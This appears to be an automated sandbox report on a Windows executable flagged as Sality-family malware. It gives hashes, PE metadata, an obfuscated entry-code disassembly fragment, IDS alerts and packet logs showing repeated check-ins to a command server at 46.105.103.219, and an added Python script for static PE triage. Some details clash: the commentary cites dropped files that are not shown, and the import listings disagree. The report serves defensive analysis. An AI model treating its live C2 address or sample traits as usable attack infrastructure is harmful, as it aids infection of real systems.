                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text............................... ................................................................].n..~.....W.E.....E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................
                                                                                                          File type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Entropy (8bit):7.968859719295659
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • VXD Driver (31/22) 0.00%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:RHxJqGoGFB.exe
                                                                                                          File size:68'608 bytes
                                                                                                          MD5:4f7fa0b66a6e153089ab00199b04356b
                                                                                                          SHA1:7c2a6d1a21501502e2186ca493a1069909bba703
                                                                                                          SHA256:2e6402a52ca73f3390ee4f703a1f509a3f2e05220034b1b36c013a083a1222bd
                                                                                                          SHA512:2715aaa37524fd853fa2ce8e93ff30ae516cccb2f6be0e6170f1bf75ab7822ca64c385e43f45310acf6691ac138351e995d37d90e41ca1176515c8c31395079e
                                                                                                          SSDEEP:1536:1irGdfpQy7sjbH9MSBKrY7zVZft5HBhw+QiKWs7BKlI1JdGtFZqV:1iGRpHYvGSL3/ftiF7BvndGpU
                                                                                                          TLSH:4A6302A3BF01436CF9004FBF1645896DE1D5D85DEEB12F73A5ADCDC2A052718832AD46
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................................ ....@..........................0.............................................
                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                          Entrypoint:0x4012e0
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows cui
                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                          DLL Characteristics:
                                                                                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:c62e7d95805a40859204937c35ee3c22
                                                                                                          Instruction
                                                                                                          bswap esi
                                                                                                          neg ah
                                                                                                          test ebx, ebp
                                                                                                          add ebp, 00046C5Bh
                                                                                                          mov cl, ah
                                                                                                          sub ebp, 00043D90h
                                                                                                          cmp cl, FFFFFFFEh
                                                                                                          mov esi, 561193B2h
                                                                                                          imul eax, esi
                                                                                                          lea ecx, dword ptr [849681C0h]
                                                                                                          neg ah
                                                                                                          mov esi, 000005BDh
                                                                                                          and eax, 18B5D1CDh
                                                                                                          add esi, 00000148h
                                                                                                          test cl, FFFFFFEDh
                                                                                                          xor al, A0h
                                                                                                          sub esi, 00000453h
                                                                                                          cmp ebx, 00005962h
                                                                                                          jnc 00007F2E44D9D7BFh
                                                                                                          test ecx, B65C5898h
                                                                                                          sbb al, 66h
                                                                                                          inc ebp
                                                                                                          mov dh, 0000004Fh
                                                                                                          add esi, 00000452h
                                                                                                          jnc 00007F2E44D9D7B4h
                                                                                                          test cl, bh
                                                                                                          bswap ebx
                                                                                                          cmp esi, 000002BAh
                                                                                                          jnc 00007F2E44D9D77Eh
                                                                                                          push edx
                                                                                                          push eax
                                                                                                          or al, ch
                                                                                                          call 00007F2E44D9D7CEh
                                                                                                          js 00007F2E44D9D7BBh
                                                                                                          add eax, FF75D89Ah
                                                                                                          mov ebp, ebp
                                                                                                          test edx, esi
                                                                                                          add esi, 000E732Ah
                                                                                                          mov dl, D6h
                                                                                                          sub esi, 000D8EAEh
                                                                                                          test edi, 0C1660B9h
                                                                                                          mov edi, 411A94DEh
                                                                                                          test edx, ecx
                                                                                                          cmp eax, 0000FA53h
                                                                                                          pop ebx
                                                                                                          cmp esi, ebx
                                                                                                          jc 00007F2E44D9D7B4h
                                                                                                          add edi, edi
                                                                                                          mov dl, ch
                                                                                                          cmp ecx, ecx
                                                                                                          movd mm4, ebx
                                                                                                          movd edx, mm4
                                                                                                          test edi, 4F195B47h
                                                                                                          mov edi, 5AED90EEh
                                                                                                          mov ah, ch
                                                                                                          adc eax, ecx
                                                                                                          lea ebx, dword ptr [FFFDEFBCh]
Name                                   Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT           0x2460           0x28          .data
IMAGE_DIRECTORY_ENTRY_RESOURCE         0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC        0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG            0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x2488           0x30          .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0              0x0
Name   Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
.text  0x1000           0x3e0         0x400     c9ed0710f013ee6bf9ff10155e1087c8  False     0.7060546875        data       5.672115596068419  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data  0x2000           0x11000       0x10600   248e62319e676cfbcb06c1298c439fef  False     0.9951991889312977  data       7.988084869146433  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
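The section table is where this file gives itself away statically: .text is marked IMAGE_SCN_MEM_WRITE, .data is marked IMAGE_SCN_MEM_EXECUTE with an entropy of 7.99 and holds the import and IAT directories, the entry point (0x4012e0) sits in the writable .text, and the COFF timestamp is zero. None of that needs a sandbox. The following is an added example, not Joe Sandbox code: a dependency-free PE32 header walk that raises those four findings, run over a constructed image whose header and section-table values are copied from this report but whose section bodies are filler (so the hash and the real code are not reproduced). The 7.0 bits/byte entropy threshold is my choice.

```python
import math
import struct
from typing import Dict, List

# Section characteristic bits from winnt.h
IMAGE_SCN_CNT_CODE             = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE          = 0x20000000
IMAGE_SCN_MEM_READ             = 0x40000000
IMAGE_SCN_MEM_WRITE            = 0x80000000

ENTROPY_THRESHOLD = 7.0   # bits/byte; plain x86 code usually lands between 5 and 6.5 (assumption)


def entropy(buf: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for an empty buffer)."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> Dict:
    """Minimal PE32 walk: MZ -> e_lfanew -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (_machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, _file_chars) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        (name, vsize, va, raw_size, raw_ptr, _, _, _, _,
         chars) = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "chars": chars,
            "raw": data[raw_ptr:raw_ptr + raw_size],
        })
    return {"timestamp": timestamp, "entry_rva": entry_rva, "sections": sections}


def triage(data: bytes) -> List[str]:
    """Static red flags: zero timestamp, W+X sections, packed sections, orphaned entry point."""
    pe = parse_pe(data)
    findings: List[str] = []
    if pe["timestamp"] == 0:
        findings.append("TimeDateStamp is 0 (build time scrubbed)")
    entry_section = None
    for s in pe["sections"]:
        c = s["chars"]
        executable = bool(c & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE))
        if c & IMAGE_SCN_CNT_CODE and c & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{s['name']}: code section is writable")
        if executable and not c & IMAGE_SCN_CNT_CODE:
            findings.append(f"{s['name']}: data section is executable")
        h = entropy(s["raw"])
        if h > ENTROPY_THRESHOLD:
            findings.append(f"{s['name']}: entropy {h:.2f} (packed or encrypted)")
        if s["va"] <= pe["entry_rva"] < s["va"] + max(s["vsize"], len(s["raw"])):
            entry_section = s["name"]
    if entry_section is None:
        findings.append("entry point outside every section")
    return findings


def build_sample() -> bytes:
    """Constructed PE32 image (not the file analysed on this page): header and
    section-table values copied from the report, section bodies are filler."""
    hdr = bytearray(0x400)                              # headers occupy the first 0x400 bytes
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)             # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    # COFF: i386, 2 sections, TimeDateStamp 0, 224-byte optional header,
    # characteristics RELOCS_STRIPPED|EXECUTABLE_IMAGE|LINE_NUMS_STRIPPED|LOCAL_SYMS_STRIPPED|32BIT_MACHINE|DEBUG_STRIPPED
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, 2, 0, 0, 0, 224, 0x030F)
    opt = 0x58
    struct.pack_into("<H", hdr, opt, 0x10B)             # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, 0x12E0)       # entry 0x4012e0 - ImageBase 0x400000
    struct.pack_into("<I", hdr, opt + 28, 0x400000)     # ImageBase
    sec = opt + 224
    struct.pack_into("<8sIIIIIIHHI", hdr, sec,      b".text", 0x3E0,   0x1000, 0x400,   0x400, 0, 0, 0, 0, 0xE0000020)
    struct.pack_into("<8sIIIIIIHHI", hdr, sec + 40, b".data", 0x11000, 0x2000, 0x10600, 0x800, 0, 0, 0, 0, 0xE0000040)
    text_body = b"\xcc" * 0x400                         # low-entropy filler
    data_body = bytes(range(256)) * (0x10600 // 256)    # uniform bytes: entropy exactly 8.0
    return bytes(hdr) + text_body + data_body


if __name__ == "__main__":
    for line in triage(build_sample()):
        print(line)
```

The same walk applied to the three dropped PE32 files above (all with entropy close to 7.98) and to the "modified" 99328-byte file would surface the same pattern; for a file infector the modified-file entry is the one worth diffing against the clean original, since the infected host is what spreads from here.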
DLL | Import
msvcrt.dll | _iob, printf, fopen, fprintf, fclose, exit, fread, ferror, _controlfp, __set_app_type, __getmainargs
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-26T11:42:11.899329+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49732 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:11.899329+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49732 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:16.743004+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49735 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:16.743004+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49735 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:21.684084+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49737 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:21.684084+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49737 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:26.565787+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49742 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:26.565787+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49742 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:31.368788+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49745 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:31.368788+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49745 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:36.200224+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49746 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:36.200224+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49746 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:41.050525+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49747 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:41.050525+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49747 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:45.964254+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49748 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:45.964254+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49748 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:50.728667+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49749 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:50.728667+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49749 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:55.543033+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49750 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:55.543033+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49750 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:00.519992+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49752 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:00.519992+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49752 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:05.291200+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49759 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:05.291200+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49759 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:10.085351+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49774 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:10.085351+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49774 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:14.964564+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49786 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:14.964564+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49786 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:19.753858+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49797 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:19.753858+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49797 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:24.934464+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49808 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:24.934464+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49808 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:30.379426+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49819 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:30.379426+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49819 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:35.273608+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49834 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:35.273608+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49834 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:40.463057+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49846 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:40.463057+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49846 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:45.715241+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49857 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:45.715241+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49857 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:50.655396+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49868 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:50.655396+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49868 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:55.459153+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49880 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:55.459153+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49880 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:00.276318+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49891 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:00.276318+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49891 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:05.354825+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49902 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:05.354825+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49902 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:11.156348+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49914 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:11.156348+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49914 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:16.040513+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49925 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:16.040513+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49925 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:20.885968+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49940 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:20.885968+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49940 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:25.781545+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49951 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:25.781545+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49951 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:30.615302+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49962 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:30.615302+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49962 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:35.444529+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49973 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:35.444529+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49973 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:40.366730+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49984 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:40.366730+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49984 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:45.244056+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49995 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:45.244056+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 49995 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:50.147625+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50006 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:50.147625+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50006 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:55.298067+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50019 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:55.298067+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50019 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:00.538110+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50032 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:00.538110+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50032 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:05.399094+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50042 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:05.399094+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50042 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:10.307722+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50043 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:10.307722+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50043 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:15.407489+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50044 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:15.407489+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50044 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:20.712933+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50045 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:20.712933+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50045 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:25.593889+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50046 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:25.593889+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50046 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:30.698514+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50047 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:30.698514+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50047 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:35.698392+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50048 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:35.698392+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50048 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:41.155369+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50049 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:41.155369+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50049 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:46.228245+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50050 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:46.228245+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50050 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:51.090228+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50051 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:51.090228+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50051 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:56.062306+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50052 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:56.062306+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50052 | 46.105.103.219 | 80 | TCP
2024-11-26T11:46:00.949414+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50053 | 46.105.103.219 | 80 | TCP
2024-11-26T11:46:00.949414+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50053 | 46.105.103.219 | 80 | TCP
2024-11-26T11:46:05.871611+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 50054 | 46.105.103.219 | 80 | TCP
2024-11-26T11:46:05.871611+0100 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.4 | 50054 | 46.105.103.219 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                          Nov 26, 2024 11:42:45.964253902 CET4974880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:45.964893103 CET4974880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:46.085395098 CET804974846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:48.463747978 CET4974980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:48.585320950 CET804974946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:48.585402012 CET4974980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:48.585593939 CET4974980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:48.706002951 CET804974946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:50.728599072 CET804974946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:50.728667021 CET4974980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:50.728764057 CET4974980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:50.848706961 CET804974946.105.103.219192.168.2.4
